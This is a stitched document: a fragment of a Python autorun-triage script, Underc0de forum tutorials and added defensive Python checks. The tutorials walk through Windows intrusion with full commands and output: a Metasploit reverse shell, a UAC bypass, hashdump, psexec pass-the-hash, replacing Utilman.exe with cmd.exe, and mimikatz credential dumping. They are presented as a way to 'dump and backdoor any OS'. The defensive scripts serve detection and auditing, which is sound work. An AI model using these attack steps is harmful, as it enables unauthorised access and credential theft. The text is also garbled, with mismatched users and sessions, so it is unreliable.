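VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")

SCRIPT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)   # run by Windows Script Host
TEMP_RE = re.compile(r"\\te?mp\\|%te?mp%", re.I)            # temp directory in the path
SHORT_NAME_RE = re.compile(r"\\[^\\\s]{1,6}~\d(?=\\)")      # 8.3 short path component


def parse_run_values(text):
    """Return a list of {key, name, type, data} dicts from `reg query` output."""
    entries, key = [], None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        match = VALUE_RE.match(line)
        if match and key:
            entries.append({"key": key, **match.groupdict()})
    return entries


def triage(entries):
    """Flag autorun values whose data looks like the dropped-script pattern."""
    findings = []
    for entry in entries:
        reasons = []
        if SCRIPT_RE.search(entry["data"]):
            reasons.append("script file")
        if TEMP_RE.search(entry["data"]):
            reasons.append("temp directory")
        if SHORT_NAME_RE.search(entry["data"]):
            reasons.append("8.3 short path")
        if not reasons:
            continue
        # A script that autostarts from a temp directory is the pattern in the
        # output above; any single indicator alone is only worth a manual look.
        high = "script file" in reasons and "temp directory" in reasons
        findings.append({**entry, "reasons": reasons,
                         "severity": "high" if high else "review"})
    return findings


if __name__ == "__main__":
    for finding in triage(parse_run_values(SAMPLE_REG_QUERY)):
        print(finding["severity"], finding["name"], finding["data"], finding["reasons"])
```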
After those tutorials you are able to dump and backdoor any OS. Only for Underc0de, enjoy.
Cracking LM Hashes passwords on any Kali or Parrot OS
LM (LAN Manager) Hash is one of the earliest password hashing algorithms used in the Windows operating system.
𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
> This was the only version available until the more advanced NTLMv2 was used in Windows 2000, XP, Vista, and Windows 7.
> Although these new operating systems can support the use of LM hashing, they are mainly intended to provide backward compatibility. However, in Windows Vista and Windows 7, the algorithm is disabled by default.
> This section will introduce how to crack LM Hashes password.
In Kali Linux, you can use the findmyhash tool to crack the LM Hashes password. The syntax of the findmyhash command is as follows:
findmyhash <Encryption> -h hash
> The meaning of each option in the above syntax is shown below.
Encryption: Specify the type of hash encryption used.
-h: specifies the LM hash value to be cracked.
[Example 8-2] Use the findmyhash command to attack the LM Hashes password. The execution command is as follows:
> root@kali:~# findmyhash MD5 -h 5f4dcc3b5aa765d61d8327deb882cf99
> Cracking hash: 5f4dcc3b5aa765d61d8327deb882cf99
> Analyzing with md5hood (http://md5hood.com)…
… hash not found in md5hood
> Analyzing with stringfunction (http://www.stringfunction.com)…
… hash not found in stringfunction
> Analyzing with 99k.org (http://xanadrel.99k.org)…
… hash not found in 99k.org
> Analyzing with sans (http://isc.sans.edu)…
… hash not found in sans
> Analyzing with bokehman (http://bokehman.com)…
… hash not found in bokehman
> Analyzing with goog.li (http://goog.li)…
… hash not found in goog.li
> Analyzing with schwett (http://schwett.com)…
… hash not found in schwett
> Analyzing with netmd5crack (http://www.netmd5crack.com)…
… hash not found in netmd5crack
> Analyzing with md5-cracker (http://www.md5-cracker.tk)…
… hash not found in md5-cracker
> Analyzing with benramsey (http://tools.benramsey.com)…
… hash not found in benramsey
> Analyzing with gromweb (http://md5.gromweb.com)…
***** HASH CRACKED!! *****
The original string is: password
The following hashes were cracked:
----------------------------------
5f4dcc3b5aa765d61d8327deb882cf99 -> password
Written by UndercOde
If you think that cracking LM Hashes is too slow, you can use the psexec module in Metasploit to bypass cracking and authenticate with the hash value itself. The method of using the hash value with the psexec module is described below:
𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) By running the executable file backup.exe created by Veil on the target host (Windows 7), successfully obtain an active remote session, as shown below:
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:29:55 +0800
From the above information, you can see that Session 1 was successfully opened.
2) View user rights information. The execution command is as follows:
meterpreter > getuid
Server username: WIN-RKPKQFBLG6C\lyw
From the output, you can see that the user has normal permissions. Next, bypass UAC using the bypassuac module.
3) Bypass UAC for the lyw user. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 1…
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] UAC is Enabled, checking level…
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing…
[+] Part of Administrators group! Continuing…
[*] Uploaded the agent to the filesystem….
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:34:38 +0800
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
> Server username: NT AUTHORITY\SYSTEM
From the output, you can see that the lyw user's authority is SYSTEM at this time.
4) View the hash password values of all users on the target host. The execution command is as follows:
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY 45fa5958a01cf2b66b73daa174b19dae…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hints…
Test:"123"
[*] Dumping password hashes…
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b47e01aae0f919f529926e3:::
lyw:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::
From the output, you can see that the hashed password values of six users were captured. At this point, you can use the SMB psexec module to bypass the hash value.
5) Run session 2 in the background. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 2…
6) Use the SMB psexec module and set the required configuration option parameters. The execution command is as follows:
msf exploit(bypassuac) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.6.114
RHOST => 192.168.6.114
msf exploit(psexec) > set SMBUser Test
SMBUser => alice
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec
SMBPass => aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec
7) Start the attack. The execution command is as follows:
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.6.114:445|WORKGROUP as user 'lyw'…
[*] Uploading payload…
[*] Created \XBotpcOY.exe…
[*] Deleting \XBotpcOY.exe…
[*] Sending stage (769536 bytes) to 192.168.6.114
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.114:49159) at 2014-07-22 17:32:13 +0800
From the output, you can see that a session was successfully opened using the "Test" user.
Written by UndercOde
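Because the psexec step authenticates with the dumped hash itself, the NT hash is as good as the password, and accounts that share one hash fall together. The following added example (not part of the original post) audits pwdump-format lines for stored LM hashes, blank-password hashes and NT hashes shared between accounts, using the six lines shown above plus one constructed malformed line; the function names are this example's own.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string: no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# The six hashdump lines from the post above, followed by one constructed
# malformed line to show that damaged input is skipped rather than misread.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b47e01aae0f919f529926e3:::
lyw:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::
truncated-line:1005:aad3b435
"""

# user:rid:lm:nt::: with both hashes exactly 32 hex characters.
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_hashdump(text):
    """Return a list of account dicts; lines that do not match the format are dropped."""
    accounts = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if match:
            account = match.groupdict()
            account["rid"] = int(account["rid"])
            account["lm"] = account["lm"].lower()
            account["nt"] = account["nt"].lower()
            accounts.append(account)
    return accounts


def audit(accounts):
    """Summarise the weaknesses visible in a dump without echoing any hash."""
    report = {"lm_stored": [], "blank_nt": [], "shared_nt": []}
    by_nt = defaultdict(list)
    for account in accounts:
        if account["lm"] != EMPTY_LM:
            # A real LM hash is present: the weak legacy format is still being stored.
            report["lm_stored"].append(account["user"])
        if account["nt"] == EMPTY_NT:
            report["blank_nt"].append(account["user"])
        else:
            by_nt[account["nt"]].append(account["user"])
    # Accounts with the same NT hash have the same password, so one captured
    # hash authenticates as every account in the group.
    report["shared_nt"] = [users for users in by_nt.values() if len(users) > 1]
    return report


if __name__ == "__main__":
    result = audit(parse_hashdump(HASHDUMP))
    print("LM hash stored for:", result["lm_stored"])
    print("Blank-password NT hash:", result["blank_nt"])
    print("Accounts sharing an NT hash:", result["shared_nt"])
```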
Bypassing Utilman Login for Windows by Underc0de:
> Utilman is a Windows accessibility manager.
> This program is the most important file stored in the Windows system files. Usually it is automatically created during the system installation process, which is very important for the normal operation of the system. Under Windows, you can use the Windows + U key combination to call the Utilman process. This section describes how to bypass the Utilman program and log in to the system to run other operations.
𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) In the Windows interface, start the Kali Linux LiveCD.
2) Select Live (686-pae) on this interface, and press Enter to start Kali Linux.
3) The interface displays the files and folders of the Windows operating system. Open the Windows | System32 folders in turn.
4) Find the Utilman.exe file in the folder and rename the file to Utilman.old. Then copy the cmd.exe file and change its file name to Utilman.exe.
5) Now close Kali Linux and start Windows. Press the Windows + u key combination on the login interface
6) From this interface, you can see that a command prompt window opens. In this window, you can execute some DOS commands. For example, using the whoami command to view user information will display the cmd interface.
7) As can be seen from the output interface, the current user has the highest authority. At this point, you can perform any operation.
After learning to bypass Utilman login, you can use the mimikatz tool to restore the user's password when the target system is locked.
> The following will introduce the use of mimikatz tools to recover passwords from locked state.
8) You need to do some preparation before operation. First download the mimikatz tool from http://blog.gentilkiwi.com/mimikatz (official). Its package name is mimikatz_trunk.zip. Extract the package and save it to a USB disk. In this example, save the decompressed file to the mimikatz directory of the USB flash drive.
Well, now see the next step > Cracking the Windows
Written by UndercOde
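The swap described in steps 4 to 6 leaves two things on disk that can be checked: a Utilman.exe that is byte-identical to cmd.exe and the renamed Utilman.old. The following added example (not part of the original post) checks a System32 directory for both and optionally compares Utilman.exe against a known-good SHA-256; the sample directories are constructed with placeholder file contents, and the function names are this example's own.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_file(directory, name):
    """Case-insensitive lookup, so the check also works on an offline-mounted volume."""
    wanted = name.lower()
    for entry in Path(directory).iterdir():
        if entry.is_file() and entry.name.lower() == wanted:
            return entry
    return None


def check_utilman(system32, known_good_sha256=None):
    """Return a list of findings for the Utilman.exe replacement described above."""
    findings = []
    utilman = find_file(system32, "Utilman.exe")
    cmd = find_file(system32, "cmd.exe")
    if utilman is None:
        findings.append("Utilman.exe is missing")
    else:
        actual = sha256_of(utilman)
        if cmd is not None and actual == sha256_of(cmd):
            findings.append("Utilman.exe is byte-identical to cmd.exe")
        # The baseline comparison also catches a replacement by any other program.
        if known_good_sha256 and actual != known_good_sha256.lower():
            findings.append("Utilman.exe does not match the known-good hash")
    if find_file(system32, "Utilman.old") is not None:
        findings.append("Utilman.old is present (renamed original)")
    return findings


def build_sample(root, tampered):
    """Create a constructed stand-in for System32 with placeholder file contents."""
    system32 = Path(root) / ("tampered" if tampered else "clean")
    system32.mkdir()
    (system32 / "cmd.exe").write_bytes(b"constructed cmd.exe bytes")
    if tampered:
        (system32 / "Utilman.old").write_bytes(b"constructed utilman bytes")
        (system32 / "utilman.exe").write_bytes(b"constructed cmd.exe bytes")
    else:
        (system32 / "Utilman.exe").write_bytes(b"constructed utilman bytes")
    return system32


def demo():
    """Run the check on a clean and a tampered sample directory."""
    with tempfile.TemporaryDirectory() as root:
        clean = build_sample(root, tampered=False)
        tampered = build_sample(root, tampered=True)
        baseline = sha256_of(find_file(clean, "Utilman.exe"))
        return check_utilman(clean, baseline), check_utilman(tampered, baseline)


if __name__ == "__main__":
    clean_findings, tampered_findings = demo()
    print("clean:", clean_findings)
    print("tampered:", tampered_findings)
```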
Now let's crack the Windows login
> The Utilman bypass must be installed on the system in order to execute commands.
1) Press the Windows + U key combination on the locked Windows desktop.
2) By default, when the Windows + U key combination starts a DOS window, the height of the window buffer is 30, so longer output will not be fully visible. You therefore need to increase the buffer height in the properties menu of the DOS window.
3) Select the "Layout" tab on this interface and modify the height value under the screen buffer size. Then click the "OK" button; you can now scroll with the mouse to see everything.
4) At this point, execute some commands on the command line to recover the Windows user password. First confirm the permissions of the current user with the following command:
C:\Windows\system32> whoami
nt authority\system
5) Switch to the USB disk and check its contents. The USB disk is drive F: in this example; the commands are as follows:
C:\Windows\system32> F:
F:\>dir mimikatz
2019/05/26 03:45 4,311 README.md
2019/06/15 04:54 Win32
2019/06/15 04:54 x64
6) From the output, you can see that there are three items in the mimikatz directory. Win32 and x64 hold the two versions of mimikatz. Choose the version that matches your system architecture. The operating system in this example is 32-bit, so Win32 is chosen.
7) View the contents of the Win32 directory:
F:\>cd mimikatz
F:\Mimikatz>cd win32
F:\Mimikatz\Win32>dir
2019/06/15 04:54 29,056 mimidrv.sys
2019/06/15 04:54 189,936 mimikatz.exe
2019/06/15 04:54 27,632 mimilib.dll
8) From the output, you can see that there are three files in the Win32 directory. Among them, mimikatz.exe is the executable file.
Run the mimikatz program:
The mimikatz # prompt indicates that the mimikatz program has started successfully.
1) Recover the password. The command is as follows:
mimikatz # sekurlsa::logonPasswords
or:
mimikatz # sekurlsa::logonPasswords full
The following information is output:
Authentication Id : 0; 10201252 (00000000:009ba8a4)
Session : Interactive from 1
User Name : UndercOde
Domain : Windows7Test
SID : S-1-5-21-2306344666-604645106-2825843324-1001
msv :
[00010000] CredentialKeys
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
[00000003] Primary
* Username : UndercOde
* Domain : Windows7Test
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :
wdigest :
* Username : UndercOde
* Domain : Windows7Test
* Password : 123456
kerberos :
* Username : UndercOde
* Domain : Windows7Test
* Password : (null)
ssp :
credman :
From the above output, you can see all the information of the locked user, such as the user name, the various hash values, the domain name and the password.
Written by UndercOde